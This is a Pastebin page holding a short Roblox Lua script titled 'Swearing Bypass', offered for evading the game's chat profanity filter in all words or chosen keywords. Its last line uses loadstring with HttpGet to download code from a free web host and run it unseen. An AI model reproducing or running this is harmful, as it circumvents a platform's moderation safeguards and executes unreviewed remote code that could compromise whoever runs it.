Advertisement
trickawsome

Swearing Bypass

Aug 8th, 2019
430
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.39 KB | None | 0 0
  1. _G.Option = 'Keywords'; --[[
  2. Current options:
  3. - All: Bypasses every word you write
  4. - Keywords: Bypasses only the words down below
  5. - Secret: You'll see ? Bad.
  6. Also if you add "fuck" in keywords, you are able to say fucking ... etc
  7. ]]
  8. _G.Auto_Update = {
  9. Enabled = false;
  10. Delay = 60; -- seconds
  11. }
  12. loadstring(game:HttpGet('https://xhamiii.000webhostapp.com/',true))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement